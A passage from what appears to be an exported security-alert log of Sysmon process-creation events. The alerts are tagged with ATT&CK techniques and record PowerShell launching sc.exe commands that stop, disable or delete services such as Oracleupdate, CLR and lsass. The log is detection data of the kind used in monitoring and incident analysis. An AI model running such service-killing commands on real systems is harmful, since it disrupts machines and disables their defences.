+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.529350200Z"",""eventRecordID"":""2623"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.527\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001068ed2000}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.527"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001068ed2000}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:57.748",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.475 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001011eb2000} +ProcessId: 2532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.478032900Z"",""eventRecordID"":""2620"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.475\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001011eb2000}\r\nProcessId: 2532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.475"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001011eb2000}"",""processId"":""2532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.731",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.461 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001049ea2000} +ProcessId: 7976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Oracleupdate Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Oracleupdate Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.464047100Z"",""eventRecordID"":""2619"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.461\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001049ea2000}\r\nProcessId: 7976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Oracleupdate Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.461"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001049ea2000}"",""processId"":""7976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Oracleupdate Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.405 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bae82000} +ProcessId: 7312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.409182600Z"",""eventRecordID"":""2617"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.405\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bae82000}\r\nProcessId: 7312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:27.405"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010bae82000}"",""processId"":""7312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.635",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.254 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010e8de2000} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.256681100Z"",""eventRecordID"":""2614"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.254\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010e8de2000}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.254"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010e8de2000}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.605",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.216 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001057dd2000} +ProcessId: 4516 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete lsass 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.219002800Z"",""eventRecordID"":""2612"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.216\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001057dd2000}\r\nProcessId: 4516\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.216"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001057dd2000}"",""processId"":""4516"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.590",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.197 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001090dc2000} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.202142400Z"",""eventRecordID"":""2611"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.197\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001090dc2000}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 